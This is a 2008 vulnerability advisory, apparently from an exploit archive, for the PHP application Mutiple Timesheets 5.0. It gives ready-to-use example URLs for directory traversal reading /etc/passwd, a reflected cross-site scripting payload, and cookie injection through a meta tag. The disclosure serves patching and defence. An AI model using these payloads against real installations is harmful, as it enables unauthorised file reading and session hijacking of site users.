mutiple timesheets 5.0 - Multiple Vulnerabilities
Author: JosS
type: webapps
platform: php
port:
date_added: 2008-03-15
date_updated:
verified: 1
codes: OSVDB-43821;CVE-2008-1415;OSVDB-43820;OSVDB-43819;OSVDB-43818;OSVDB-43817;OSVDB-43247;CVE-2008-1414
tags:
aliases:
screenshot_url:
application_url:
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Mutiple Timesheets
[~] Download: http://riceball.com/drupal/files/mts-5.zip
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Good!
[+] Directory traversal:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[FILE]
[~] Example: http://localhost/apps/mts/mts/?tab=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
[+] Cross Site Scripting:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[XSS]
[~] Example: http://localhost/apps/mts/mts/?tab=>'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>
[+] Cookie Manipulation:
[~] Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php
[~] Exploit: http://localhost/PATH/index.php?mode=edit&tab=[Cookie]
[~] Example: /apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# milw0rm.com [2008-03-16]